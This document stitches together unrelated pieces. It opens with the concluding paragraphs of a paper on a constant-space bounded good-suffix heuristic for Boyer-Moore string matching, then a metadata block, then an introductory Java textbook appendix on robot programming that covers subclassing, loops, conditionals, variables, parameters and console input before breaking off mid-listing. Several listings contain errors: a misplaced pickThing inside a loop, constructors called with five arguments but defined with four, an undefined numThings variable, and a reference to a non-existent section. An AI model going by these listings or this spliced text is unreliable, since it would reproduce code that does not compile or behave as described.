Space and time economy are essential features of any practical algorithm. However, they are often sacrificed in favor of asymptotic efficiency. This is the case of the most practical string matching algorithms which show in practice a sublinear behavior at the price of using extra memory of non-constant size to maintain auxiliary information. The \textit{Boyer-Moore} algorithm, for instance, requires additional $O(m)$ and $O(|\Sigma|)$-space to compute the tables relative to the good-suffix and to the bad-character heuristics, respectively.
In this paper we have presented a practical modification of the good-suffix heuristic, called bounded good-suffix heuristic, which uses only constant space and can be computed in $O(m)$-time and constant space.
Through an extensive collection of experimental tests on the \textit{Boyer-Moore} algorithm and two of its most efficient variants (namely the algorithms \textit{Fast-Search} and \textit{Forward-Fast-Search}) we have shown that the “bounded” versions are comparable with their counterparts, which are often outperformed by them.
We are currently investigating the problem of finding an effective string matching algorithm which requires only extra constant space. To this purpose, we expect that the bad-character heuristic (which needs $O(|\Sigma|)$-space) needs to be dropped and substituted by a heuristic of a different kind.
References
|
{"Source-Url": "http://www.dmi.unict.it/~faro/papers/conference/faro26.pdf", "len_cl100k_base": 10404, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 51562, "total-output-tokens": 12276, "length": "2e13", "weborganizer": {"__label__adult": 0.0004856586456298828, "__label__art_design": 0.0004651546478271485, "__label__crime_law": 0.0006775856018066406, "__label__education_jobs": 0.0010156631469726562, "__label__entertainment": 0.0001678466796875, "__label__fashion_beauty": 0.00026702880859375, "__label__finance_business": 0.0004792213439941406, "__label__food_dining": 0.0005035400390625, "__label__games": 0.000766754150390625, "__label__hardware": 0.0019969940185546875, "__label__health": 0.0011386871337890625, "__label__history": 0.0005035400390625, "__label__home_hobbies": 0.00015425682067871094, "__label__industrial": 0.0007839202880859375, "__label__literature": 0.0006213188171386719, "__label__politics": 0.00052642822265625, "__label__religion": 0.0009260177612304688, "__label__science_tech": 0.33740234375, "__label__social_life": 0.00014960765838623047, "__label__software": 0.01190948486328125, "__label__software_dev": 0.6376953125, "__label__sports_fitness": 0.0004322528839111328, "__label__transportation": 0.0007615089416503906, "__label__travel": 0.00024628639221191406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 36564, 0.06779]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 36564, 0.45155]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 36564, 0.80887]], "google_gemma-3-12b-it_contains_pii": [[0, 2876, false], [2876, 5964, null], [5964, 9179, null], [9179, 12123, null], [12123, 15091, null], [15091, 18839, null], [18839, 20160, null], [20160, 23298, null], [23298, 27051, null], [27051, 31161, null], [31161, 31585, null], [31585, 35676, null], [35676, 36564, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2876, true], [2876, 5964, null], [5964, 9179, null], [9179, 12123, null], [12123, 15091, null], [15091, 18839, null], [18839, 20160, null], [20160, 23298, null], [23298, 27051, null], [27051, 31161, null], [31161, 31585, null], [31585, 35676, null], [35676, 36564, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 36564, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 36564, null]], "pdf_page_numbers": [[0, 2876, 1], [2876, 5964, 2], [5964, 9179, 3], [9179, 12123, 4], [12123, 15091, 5], [15091, 18839, 6], [18839, 20160, 7], [20160, 23298, 8], [23298, 27051, 9], [27051, 31161, 10], [31161, 31585, 11], [31585, 35676, 12], [35676, 36564, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 36564, 0.11429]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
9aba115baa41e687c1139b9b78472f8262e1d03c
|
Appendix F can be used to either look ahead to what you will be learning, or as a review for what you have learned. This appendix provides a view of the lay of the land. It’s like standing on a high hill at the beginning of a hike to see what kind of interesting places lie ahead – or surveying the view at the end of the hike to see where you’ve been.
If you are at the beginning of your hike and looking ahead, this chapter gives a glimpse of nine interesting places in the journey to becoming an object-oriented programmer. By getting an early view of them, you will know a little bit of what is to come, and be better able to integrate what you are learning into a cohesive whole. And, as any hiker knows, trudging up a mountain is easier if you can look forward to what lies at the top and on the other side. Obviously, there will be lots of details clarified later.
If you are at the end of your hike and looking backwards, this appendix can help you remember where all you’ve been and what you’ve learned. It could be used, for example, as part of your review before an exam.
Chapter Objectives
- To see how to extend classes with new services.
- To see how to perform a task repeatedly.
- To see how programs can decide whether to take an action.
- To see how to remember information temporarily.
- To see how to make services more flexible by receiving information when they are executed.
- To see how to interact with the program’s user.
- To see how to remember information for an object’s lifetime.
- To see how to send the same message to different kinds of objects, with each object behaving in a way appropriate for itself.
- To see how to gather similar information together with a collection.
F.1 Extending an Existing Class
Suppose that karel is working for a construction company that is paving several streets running east and west. At each end of the construction site are walls, blocking traffic from using the streets. Traffic continues to cross the construction site on the avenues, however. To warn the cross-traffic to slow down, flashers are placed on each intersection every night. karel, jasmine, and pat have the job of collecting them again in the morning. One robot begins on the west end of each street being paved. They each proceed to the east end, collecting the flashers along the way. When they have collected them all, they turn around. Their initial and final situations are shown in Figure F-1 and Figure F-2.
The flashers shown in Figure F-1 are special kinds of Thing objects that have a special appearance. They also have two additional services, one to turn on the flashing light and another to turn it off.
F.1.1 Using Existing Techniques
Solving this problem is not difficult, but it is long and repetitive. The program has six lines of code placing walls, and twelve placing flashers. The instructions to each robot are nine lines long, and are repeated three times, once for each robot. Each set of instructions is the same except for the name of the robot. Much of the program is shown in Listing F-1. Some repetitive lines are omitted.
One of the primary tasks of programming is to find better abstractions for programs such as these, so they become easier to read, write, and understand.
import becker.robots.*;
public class Main extends Object {
public static void main(String[] args) {
City site = new City();
Wall detour0 = new Wall(site, 0, 1, Directions.EAST);
Wall detour1 = new Wall(site, 0, 2, Directions.EAST);
Wall detour2 = new Wall(site, 0, 3, Directions.EAST);
Wall detour3 = new Wall(site, 5, 1, Directions.WEST);
Wall detour4 = new Wall(site, 5, 2, Directions.WEST);
Wall detour5 = new Wall(site, 5, 3, Directions.WEST);
Flasher flash00 = new Flasher(site, 1, 1, true);
Flasher flash01 = new Flasher(site, 2, 1, true);
Flasher flash02 = new Flasher(site, 3, 1, true);
Flasher flash03 = new Flasher(site, 4, 1, true);
Flasher flash04 = new Flasher(site, 1, 2, true);
Robot karel = new Robot(site, 1, 1, Directions.EAST);
Robot jasmine = new Robot(site, 1, 2, Directions.EAST);
Robot pat = new Robot(site, 1, 3, Directions.EAST);
CityFrame frame = new CityFrame(site, 6, 5);
karel.pickThing();
karel.move();
karel.pickThing();
karel.move();
karel.pickThing();
karel.move();
karel.turnLeft();
karel.turnLeft();
jasmine.pickThing();
jasmine.move();
jasmine.turnLeft();
jasmine.turnLeft();
pat.pickThing();
pat.move();
pat.turnLeft();
pat.turnLeft();
pat.turnLeft();
F.1.2 Creating A New Kind of Robot
This program would be so much easier to understand if the robots could do more than just pick things up, move, turn left, and put things down. For example, what if we had a new kind of robot that can also collect a row of flashers, and turn around? With this new kind of robot, nine lines of instruction for each robot could be reduced to two:
```java
karel.collectFlashers();
karel.turnAround();
```
Besides making the main program shorter and easier to understand, defining a new kind of robot also allows us to reuse code. Not only can karel use these two services, but so can jasmine and pat.
We can and should create a new kind of robot with new services whenever a complex task has distinct parts or the same task is performed several times, either by the same robot or several robots.
Listing F-2 shows how to define a new kind of robot named Collector with two new services: collectFlashers, and turnAround. This code should be in its own file, named Collector.java.
Each of the two new services, defined in lines 9-18 and 20-24, follow a regular pattern: the keywords `public` and `void` are followed by the name of the service and a pair of parentheses. After this, between `{` and `}`, are the instructions that tell the robot how to carry out the new command.
When a robot named karel is told to move, we name the robot and then tell it to move – for example, karel.move(). This approach doesn’t work inside a new kind of robot like Collector, because we don’t know what the robot will be named. It could be named karel, jasmine, pat, or something else. So we tell “this robot” to move by writing this.move().
The name of the class, Collector, must be used to construct these new kinds of robots. Replace lines 31, 32, and 33 in Listing F-1 with
```java
Collector karel = new Collector(
site, 1, 1, Directions.EAST, 0);
Collector jasmine = new Collector(
site, 1, 2, Directions.EAST, 0);
Collector pat = new Collector(
site, 1, 3, Directions.EAST, 0);
```
karel, jasmine and pat have all the capabilities of ordinary robots. They can move, turn left, pick things up, and put things down. They can also collect a row of four flashers and turn around, thanks to the definitions contained in Listing F-2. And so, we can replace lines 39 to 47 in Listing F-1 with just two lines:
F.1 Extending an Existing Class
karel.collectFlashers();
karel.turnAround();
A similar replacement can be made for jasmine and pat.
Listing F-2: The definition of a new kind of robot that has two new services for collecting flashers and turning around.
```java
import becker.robots.*;
public class Collector extends Robot {
public Collector(City city, int ave, int str, int dir) {
super(city, ave, str, dir);
}
// Collect a row of four flashers
public void collectFlashers() {
this.pickThing();
this.move();
this.pickThing();
this.move();
this.pickThing();
this.move();
this.pickThing();
}
// Turn around and face the opposite direction
public void turnAround() {
this.turnLeft();
this.turnLeft();
}
}
```
F.1.3 Creating Other New Kinds of Robots
Looking back to Chapter 1, we could have used new kinds of robots many times. In one end-of-chapter problem the robot moved around a square. It could have used a new service named moveAlongSide. The robot in many of the problems could have used a new service named turnRight, and in another problem two different robots could have each used move3. In each of these situations, one or more robots performed the same sequence of instructions several times, or a complicated action could have been broken down into several steps.
New kinds of robots, customized for these situations, can be defined with the template shown in Listing F-3. Most of the code is the same for every new kind of robot. You need to replace `<className>`, and `<newService>` to customize the template for your unique needs. `<className>` follows rules
that we learned in Chapter 1. Use the same name both places that
«className» appears.
Listing F-3: A template for creating a new kind of robot with a new service. Additional ser-
vice may also be added.
```java
import becker.robots.*;
public class «className» extends Robot {
public «className»(City city, int ave, int str, int dir) {
super(city, ave, str, dir);
}
«newService»
}
```
In fact, this same technique can also be used to create a new kind of city
that has new services to place walls and flashers for the construction site.
The new kind of city might be called a ConSite, short for “construction site.”
It has two new services, one for placing barriers (walls) and another for plac-
ing flashers.
Using a ConSite city and Collector robots significantly shortens our
main program, making it easier to read and understand. The revised program
is shown in Listing F-4. This program behaves exactly the same as the 69 line
program shown in Listing F-1, but is much simpler and easier to read.
Listing F-4: A new version of the program using a new kind of robot and a new kind of city.
```java
import becker.robots.*;
public class NewMain extends Object {
public static void main(String[] args) {
ConSite site = new ConSite();
site.placeBarriers();
site.placeFlashers();
Collector karel = new Collector(site, 1, 1, Directions.EAST);
Collector jasmine = new Collector(site, 1, 2, Directions.EAST);
Collector pat = new Collector(site, 1, 3, Directions.EAST);
CityFrame frame = new CityFrame(site, 6, 5);
}
}
```
F.2 Repeating Statements
The paving project where karel, jasmine, and pat work has been progressing smoothly. However, an influential resident on jasmine’s street has convinced city council to pave one extra block of that street. To offset the cost, only two blocks of pat’s street will be paved. The new situation is shown in Figure F-3.
Now we have a problem – we apparently need three different kinds of robots. karel, the top robot in Figure F-3, can still be a Collector, as we defined in Listing F-2. jasmine, the middle robot, must collect the flasher from an extra intersection. pat, the bottom robot, will malfunction unless we instruct it to collect flashers from only three intersections rather than four.
Creating three different kinds of robots that do almost the same task is a poor solution. Fortunately, there is a better way. We know that each robot has completed its task when it reaches the wall at the opposite end of the street. In between the starting position and that wall, each robot does the same steps over and over: collect a flasher, and move to the next intersection.
If we can define the Collector robots this way, then karel, jasmine, and pat can all be the same kind of robot. Java’s while statement can be used to repeat statements over and over. The while statement can be used whenever a task is composed of identical steps that are repeated until the task is done. In this case, the identical steps are collecting a flasher and moving to the next intersection. These steps are repeated until the opposite wall is reached. Using this algorithm, each of the three robots will perform correctly even though they are collecting flashers on different lengths of street.
A version of collectFlashers that uses this idea is shown in Listing F-5. The while statement extends from line 11 to line 14 and consists of three parts.
- The keyword while signals to Java that something is going to be repeated.
- The condition determines if the statements should be repeated again. In this example, the condition is (this.frontIsClear()) – is this robot’s front clear of anything that can prevent it from moving (like a wall)?
- The body of the while statement, the part between { and }, is the code that is repeated.
Listing F-5: The Collector class, defined with a while loop in collectFlashers.
```java
import becker.robots.*;
public class Collector extends Robot {
public Collector(City city, int ave, int str, int dir) {
super(city, ave, str, dir);
}
// Collect flashers as long as the front of the robot is not blocked.
public void collectFlashers() {
while (this.frontIsClear()) {
this.pickThing();
this.move();
this.pickThing();
}
// turn around and face the opposite direction
this.turnLeft();
this.turnLeft();
}
}
```
Many tasks do the same steps over and over, until the task is finished.
Find The Code: layofland/repetition
How does this while loop work? When a robot is told to collect flashers, the while loop first checks if the robot’s front is clear. That is, it checks if it is blocked from moving forwards. If its front is clear, then it does everything in the braces at lines 12-14. After it picks up a flasher and moves to the next intersection, execution returns to line 11. The robot again checks if its front is clear. If it is, everything in the braces is executed. This keeps happening – check if the front is clear, and if it is, do everything in the braces – until the front is not clear. Then execution resumes at line 15 – the line following the while loop’s closing brace. Figure F-4 illustrates this process.
Figure F-4: Illustrating the execution of a while loop. The dark lines in the code indicate the statements that are executed to arrive at the situation shown on the right.
```java
while (this.frontIsClear())
{ this.pickThing();
this.move();
}
this.pickThing();
while (this.frontIsClear())
{ this.pickThing();
this.move();
}
this.pickThing();
while (this.frontIsClear())
{ this.pickThing();
this.move();
}
this.pickThing();
while (this.frontIsClear())
{ this.pickThing();
this.move();
}
this.pickThing();
```
The while loop contains one pickThing instruction and one move instruction, so the robot will always pick something up just as often as it moves. However, the initial situation shows that it needs to move twice but pick up
three flashers. Thus, there must be one `pickThing` instruction after the loop to ensure that the extra flasher is picked up.
A `while` loop is useful to repeat some code over and over. In this example, the repeated code picked something up and moved. A robot could also use a `while` loop to move until a streetlight is encountered, to pick up all the flashers on a corner, to turn left until its front is clear, and so on.
### F.3 Making Decisions
Work has been proceeding nicely on the construction site. *karel, jasmine, and pat* are still collecting the flashers every morning. One morning, however, they were unable to complete their jobs. It appears that several flashers were stolen during the night. The robots malfunctioned when they reached the empty intersections and tried to pick up the missing flashers. The construction project is already over budget, and so the decision has been made to distribute the eight remaining flashers randomly on the intersections.
Figure F-5 shows just two of the many possible initial situations. As you can see, the robots can no longer automatically try to pick up a flasher from every intersection. They must be reprogrammed to first check if a flasher is present.
A robot may need to make decisions in other contexts, as well. It may need to detect whether its way is blocked by a wall. If so, turn. It may need to check whether it is facing south, and if it is, turn around. It may need to check whether there are enough things in its backpack to carry out a job. If not, go to a supply depot and get some more.
In each of these contexts, the robot should use an `if` statement. An `if` statement tests a condition. If the condition is true, some additional code is executed. If the condition is false, the additional code is skipped. For example,
the additional code is `karel.pickThing()` and the condition is `karel.isBesideThing()`. If the condition is true – `karel` is, in fact, beside a `Thing` (a flasher) – then the additional code is executed and the thing is picked up. If `karel` is not beside a `Thing`, then `karel` won’t even try to pick something up.
Figures F-6 and F-7 show two different initial situations and how `karel` behaves when the code shown is executed. In each case, arrows show how execution proceeds through the code.
Now, we need to apply this knowledge to keep `karel`, `jasmine`, and `pat` from malfunctioning when they do their jobs. The code we need to fix is the `collectFlashers` service in Listing F-5. Each use of `this.pickThing()` must be replaced with three lines:
if (this.isBesideThing())
{ this.pickThing();
}
We again use this instead of a robot’s name because we are defining a new kind of robot that might be given the name karel, jasmine, pat – or a completely new name.
Checking whether or not a robot is beside a thing is just one use of the if statement. It is useful in many situations, wherever a program must determine whether or not some code should be executed. Use it to test whether or not a robot should pick something up, or whether or not something should be put down. Eventually, we will use the if statement to test whether or not a credit card’s balance is low enough to make a debit, or whether or not a name is too long to print in the allotted space, to give just a few examples.
The if statement and the while statement are sometimes confused by beginning programmers. Both include a test, but they are used for fundamentally different things. A while statement tests if code should be executed again. The code in the braces might be executed many, many times. An if statement tests whether to execute code exactly once or not at all.
F.3.1 Testing for Specific Kinds of Things
The test for being beside a Thing is very general. Flashers are Things, but so are ordinary Things! In addition, the techniques we used in Section G.1 to extend the Robot class can also be used to create new kinds of Things.
What if some other kinds of Things are on the construction site? For example, suppose one of the intersections has a “tool” (represented by a Thing), but no flasher. Then, when karel comes to that intersection, karel first tests if it is beside a Thing. The “tool” will cause the condition to be true, and karel will pick it up.
To solve this problem, we can write
if (this.isBesideThing(Predicate.aFlasher))
{ this.pickThing(Predicate.aFlasher);
}
The new part, Predicate.aFlasher, tells isBesideThing and pickThing that we are only interested in Things that happen to be Flashers. isBesideThing should only test if the robot is beside a Flasher, and pickThing should only attempt to pick up Flashers. This restriction to Flashers only applies to the isBesideThing and pickThing where Predicate.aFlasher is included. It is not “remembered” for the next time.
F.3.2 Helper Methods
The part of `collectFlashers` that picks flashers up is becoming more complicated. It now includes a test to check whether the robot is actually beside a `Thing`, and whether that `Thing` is, in fact, a flasher. Replacing the simple statement `this.pickThing()` in Listing F-5 with the three lines shown above obscures the logic of the while loop.
One way to make `collectFlashers` easier to understand is to create another service to handle the complexity of picking up a flasher. This new service might be named `pickFlasherIfPresent`. Services that exist just to simplify another method are sometimes called helper methods.
Listing F-6 shows a version of the `Collector` class that defines `pickFlasherIfPresent`. `collectFlashers` uses the method with the statement
```
this.pickFlasherIfPresent();
```
By defining and using this helper method, the intricacies of picking up a flasher only need to be written once instead of twice (once in the while loop and once more right after the loop). It also retains the original simplicity of the `collectFlashers` method.
Listing F-6: One method, `pickFlasherIfPresent`, can help another method, `collectFlashers`, carry out its task.
```java
import becker.robots.*;
public class Collector extends Robot {
public Collector(City city, int ave, int str, int dir) {
super(city, ave, str, dir);
}
// Collect flashers as long as the front of the robot is not blocked.
public void collectFlashers() {
while (this.frontIsClear()) {
this.pickFlasherIfPresent();
this.move();
}
this.pickFlasherIfPresent();
}
// pick up a flasher, if one is present on the current intersection
public void pickFlasherIfPresent() {
if (this.isBesideThing(Predicate.aFlasher)) {
this.pickThing(Predicate.aFlasher);
}
}
// remainder of class omitted
}
```
F.4 Temporary Memory
The city’s public works department has taken the walls from the paving project to another work site. The new situation is shown in Figure F-8.
This presents a problem. karel, jasmine, and pat had been using the walls to determine when to stop collecting flashers. Without the walls, they will keep going east. At each intersection they will check for a flasher. Not finding one, they will go to the next intersection and check again – forever.
One possible solution is for each robot to count the number of moves it makes. Each robot should move four times, attempting to collect a flasher before each move. Then, collect the last flasher (if there is one) and turn around. A significant disadvantage of this plan is that karel and pat will have to travel farther than before. We will simply accept that limitation for now.
To make this plan work, each robot will need to remember how many moves it has made while it is collecting flashers. Java provides variables to store or remember information. A variable is like a box with a name. Each variable stores a piece of information; in this case, a number. The number can be replaced by a new number at any time.
The following code creates a new variable named numMoves and stores a number, zero, in it.
```java
int numMoves = 0;
```
A different number, in this case five, can be stored in numMoves like this:
```java
numMoves = 5;
```
Notice that “int” is only used the first time, when the variable was created. “int” indicates that the variable will store an integer, a certain kind of number.
We can also use variables to calculate new values. For example,
```java
int a = 0;
a = numMoves + 1;
```
will first create a new variable named “a”. In the next line, Java will first get the number stored in `numMoves` (5) and add 1 to it, obtaining 6. This new number is then put into the variable `a`, replacing the number that was there. The variable on the left side of the equals sign is forced to have the value calculated on the right side of the equals sign.
We can also use the same variable on both the left and the right side of the equals sign. For example,
```java
numMoves = numMoves + 1;
```
gets the current number stored in `numMoves` (5) and adds 1 to it. This new number, 6, is then stored in the variable named on the left side of the equals sign. That is, `numMoves` is now one larger than it used to be. This is the fundamental step in counting – remembering a number one larger than the previous number.
Now, we can combine counting with a `while` loop to move a robot four times, a slight simplification of collecting flashers.
```java
public void move4()
{
int numMoves = 0;
while (numMoves < 4)
{
this.move();
numMoves = numMoves + 1;
}
}
```
Figure F-9 illustrates how this code is executed. It begins by creating a variable, `numMoves`, to store the number of moves the robot has made so far. The robot hasn’t moved yet, so the first value stored is zero. The test in the `while` loop, `numMoves < 4`, checks to see if the loop should continue. If the number of moves made so far, `numMoves`, is less than four, the two statements between the braces are executed. Otherwise, the loop ends. Inside the loop, the robot is told to move and the number of moves is incremented by 1. A `while` loop used in this way is sometimes called a “counted while loop.”
This particular `while` loop executes the `move` instruction four times, but it compares `numMoves` to 4 a total of five times. In Figure F-9, every time an arrow points to the line `while (numMoves < 4)` the comparison is made. The first four times it is true that `numMoves` is less than 4. The last time, however, `numMoves` has the value 4, and the loop ends.
To solve the flasher collection problem for karel, jasmine, and pat, the code shown in Figure F-9 must also pick up a flasher just before the robot moves, if one is present and again after the loop exits. This change is shown in Listing F-7. This version of collectFlashers always moves four times and checks five intersections for flashers. To understand why, look again at Figure F-9 – the robot moves four times but visits five intersections.
Listing F-7: A version of collectFlashers that always checks exactly five intersections.
```java
public void collectFlashers()
{
int numMoves = 0;
while (numMoves < 4)
{
this.pickFlasherIfPresent();
this.move();
numMoves = numMoves + 1;
}
this.pickFlasherIfPresent();
}
```
When a variable is defined inside a method it is called a temporary variable. It may be used only within the method while the method is executing. When the method is finished, the temporary variable and the information it contains is discarded.
A temporary variable may be used to control a while loop any time you know how many times a set of steps should be repeated. This is quite different from the way the while loop was used in Section F-2. There the steps were repeated over and over until the task was done. We didn’t know, when we started out, how many times the loop would repeat before we reached a wall and stopped.
Examples that effectively combine a temporary variable with a while loop include:
- moving a robot around the four sides of a square.
- picking up exactly 100 flashers,
- running 10 laps around a track.
- counting the number the things on an intersection, replacing half of them.
In each example, a set of steps is repeated a known number of times.
The last example is interesting because it uses two loops, with the information gathered in the first used to control the second. Listing F-8 shows one way to solve the problem:
Temporary variables are discarded when the method containing them is finished executing.
Use a counted loop when the number of repetitions is known in advance.
Listing F-8: Picking up half of the things on an intersection.
```java
public void pickHalf()
{
int numThingsFound = 0;
while (this.isBesideThing())
{
this.pickThing();
numThingsFound = numThingsFound + 1;
}
int numPutBack = 0;
while (numPutBack < numThingsFound/2)
{
this.putThing();
numPutBack = numPutBack + 1;
}
}
```
The first loop, at lines 3-6, is not a counted loop. We don’t know how many times it will execute. Rather, it repeats while there is still something on the intersection, counting the number of things it picks up. This count is kept in a temporary variable named `numThingsFound`.
The second loop, at lines 9-12, is a counted loop. It divides the number of things found by 2 to calculate how many times to execute. As long as `numPutBack` is less than this number, another thing is put down and the count of things put down is incremented by one.
Remembering information temporarily in a variable is useful beyond controlling loops. In the last example, the robot remembered how many things were on the intersection so it could put back half of them. It might remember which avenue and street it was on before beginning a task so it can return there when it’s done, or the direction it’s facing so it can turn that way again.
**F.5 More Flexible Methods**
The manager of the construction company has become concerned about the solution just implemented. Recall that when the walls were in place, `karel`, `jasmine`, and `pat` each traveled only as far as needed to collect the flashers on their assigned street. Now, each robot checks five intersections even though `karel` is on a street where only four need to be checked, and `pat` really only needs to check 3 intersections. The manager is concerned that `karel` and `pat` will wear out faster than necessary. She would like a way to tell each robot how many intersections to check for flashers.
What the manager wants is a more flexible version of the service developed in the previous section. There, we developed a service that always moved four times, checking a total of five intersections for flashers to collect. Instead of always checking five intersections, the manager should be able to
F.5 More Flexible Methods
tell each robot how many intersections to check. This would be done in the main method. In Listing F-4 we wrote
```java
16 karel.collectFlashers();
17 karel.turnAround();
18
19 jasmine.collectFlashers();
20 jasmine.turnAround();
21
22 pat.collectFlashers();
23 pat.turnAround();
```
We would like to replace these lines with statements that specify the number of intersections the robot should check. For example,
```java
16 karel.collectFlashers(4);
17 karel.turnAround();
18
19 jasmine.collectFlashers(5);
20 jasmine.turnAround();
21
22 pat.collectFlashers(3);
23 pat.turnAround();
```
With this change, the main method tells karel to check four intersections. Similarly, jasmine and pat are told to check five and three intersections, respectively.
Implementing this ability requires communicating the 3, 4 or 5 (or any other number) from the place where `collectFlashers` is called to the place where the number is used – the definition of `collectFlashers`. Adding a parameter to `collectFlashers` facilitates this communication.
We need to make some minor modifications to the definition of `collectFlashers` to receive the parameter given in main. The new version is shown in Listing F-9. The changes from the previous version, described on page 485, are in bold.
**Listing F-9: A more flexible version of `collectFlashers` that uses a parameter.**
```java
1 public void collectFlashers(int numIntersections)
2 {
3 int numMoves = 0;
4 // move one fewer times than there are intersections
5 while (numMoves < numIntersections - 1)
6 { this.pickFlasherIfPresent();
7 this.move();
8 numMoves = numMoves + 1;
9 }
10 this.pickFlasherIfPresent();
11 }
```
numIntersections is like a temporary variable that is automatically assigned a value just before collectFlashers begins to execute. The value it is assigned is the value given between the parentheses when collectFlashers is called. When we write karel.collectFlashers(4), numIntersections will be given the value four. When we write jasmine.collectFlashers(5), then numIntersections will be given the value five.
To check five intersections, the robot needs to move four times – one less than the number of intersections. This observation implies that the loop should execute numIntersections – 1 times – one fewer intersections than specified by the manager. The while loop’s test at line 3 takes this into account.
A complete listing of the class containing main is given in Listing F-10. It uses a new kind of City, shown in Listing F-11. This class uses the same technique used to extend a Robot to add a useful service to a City: placing the flashers. Finally, a complete listing of the Collector robot is given in Listing F-12.
The parameter added in these listings gives collectFlashers a tremendous amount of flexibility. This simple change shifts the service from always checking five intersections to being able to check any number of intersections. You can probably imagine how parameters could be used to make a service that can move a robot any distance or a service that can pick a specified number of things. Eventually, you will be able to write a goto service that directs a robot to go to a particular intersection, no matter where in the city it is (provided nothing blocks it).
Listing F-10: A main method calling services with parameters.
```java
import becker.robots.*;
public class Main extends Object {
public static void main(String[] args) {
ConSite site = new ConSite();
site.placeFlashers();
Collector karel =
new Collector(site, 1, 1, Directions.EAST);
Collector jasmine =
new Collector(site, 1, 2, Directions.EAST);
Collector pat =
new Collector(site, 1, 3, Directions.EAST);
CityFrame frame = new CityFrame(site, 7, 4);
karel.collectFlashers(4);
karel.turnAround();
jasmine.collectFlashers(5);
jasmine.turnAround();
pat.collectFlashers(3);
pat.turnAround();
}
}
```
Listing F-11: A new kind of city with a service to place flashers on the construction site.
```java
import becker.robots.*;
public class ConSite extends City {
public ConSite() {
super();
}
public void placeFlashers() {
Flasher flash01 = new Flasher(this, 2, 1, true);
Flasher flash03 = new Flasher(this, 4, 1, true);
Flasher flash04 = new Flasher(this, 1, 2, true);
Flasher flash06 = new Flasher(this, 3, 2, true);
Flasher flash07 = new Flasher(this, 5, 2, true);
Flasher flash08 = new Flasher(this, 1, 3, true);
Flasher flash10 = new Flasher(this, 3, 3, true);
}
}
```
Listing F-12: A new kind of robot that can collect flashers from a specified number of intersections.
```java
import becker.robots.*;
public class Collector extends Robot {
public Collector(City city, int ave, int str, int dir) {
super(city, ave, str, dir, numThings);
}
public void collectFlashers(int numIntersections) {
int numMoves = 0;
// move one fewer times than there are intersections
while (numMoves < numIntersections - 1) {
this.pickFlasherIfPresent();
this.move();
numMoves = numMoves + 1;
}
this.pickFlasherIfPresent();
}
// pick up a flasher, if one is present on the current intersection
public void pickFlasherIfPresent() {
if (this.isBesideThing(Predicate.aFlasher)) {
this.pickThing(Predicate.aFlasher);
}
}
public void turnAround() {
this.turnLeft();
this.turnLeft();
}
}
```
F.6 Asking the User
The manager of the construction company has expressed appreciation for the flexibility gained by adding the parameter to `collectFlashers`, but she is not quite satisfied. As it stands, the main method always tells `karel` to collect flashers from four intersections, `jasmine` is always told to collect from five intersections, and `pat` is always told to collect from three intersections. The manager would like to vary the instructions each time the program is run. Sometimes `karel` should collect from two intersections and sometimes from forty – depending on the manager’s whim.
We can solve this problem by getting input – a number – from the human who runs the program, storing that number in a temporary variable, and then
passing the number to collectFlashers via a parameter. These changes all take place within the main method.
For each piece of information required, we must do three things:
- tell the user what information is being requested
- get the information from the user, placing it in a temporary variable
- finish getting the current line of information, preparing for the next line
We will repeat these three steps three times, once for each robot. After we have all the information stored in the temporary variables, we can use the variables to tell each of the robots how many intersections to visit.
When the program actually runs, the user will be asked for the information in a separate window, called the console, shown in Figure F-10. The user will likely need to click on the console to bring it to the front before it will accept input from the keyboard. After each number is typed, the user should press the “Enter” key. If something other than a number without a decimal point is typed, the program will give an error message and stop.
Consider the situation shown in Figure F-10 and suppose the user enters 3 for the last number. When the “Start” button is clicked, the top-most robot will collect flashers from 40 intersections, proceeding off the right edge of the display in the process. The middle robot will collect the flasher from (1,2), proceed to (2,2), and turn around. The bottom robot will collect the flashers from three intersections, and then turn around.
So what does the code to do this look like? For each of the three steps listed earlier we would write instructions like this:
```java
System.out.print("Number of intersections karel should check: ");
int kNum = in.readInt();
in.readLine();
```
The first line uses a special object, `System.out`, to print a message on the console window. The object's `print` service simply prints the characters that appear between the double quotes in its parameter.
The second line does two things. First, it creates a new temporary variable, `kNum`, the number of intersections `karel` should check for flashers. Then it uses an object named `in` to get a number from the user, putting the number it gets into `kNum`. In Figure F-10 the user has entered the number 40; the `readInt` service gets this number and places it in `kNum`.
In the third line, the `readLine` service is used to process the rest of the line where the user entered the number 40, preparing for the next cycle of asking for information and getting it.
These three lines of code use two objects, `System.out` and `in`. `System.out` is a special object that is automatically constructed when the program starts. It's primary service is `print`. The other object, `in`, must be constructed by the programmer before it is used. Its construction is similar to the construction of `Robot` or `City` objects except that the name of the class is `TextInput`:
```java
TextInput in = new TextInput();
```
The `TextInput` class must be imported before it can be used. Include
```java
import becker.io.TextInput;
```
at the beginning of the file using the `TextInput` class.
Finally, the number stored in the temporary variable `kNum` can be given to the `collectFlashers` method with the statement
```java
karel.collectFlashers(kNum);
```
This directs `karel` to check 40 intersections for flashers, assuming the interaction shown in Figure F-10.
Listing F-13 shows how to integrate this new code into the `main` method.
Listing F-13: A program which asks the user how many intersections each robot should check.
```java
import becker.robots.*;
import becker.io.*;
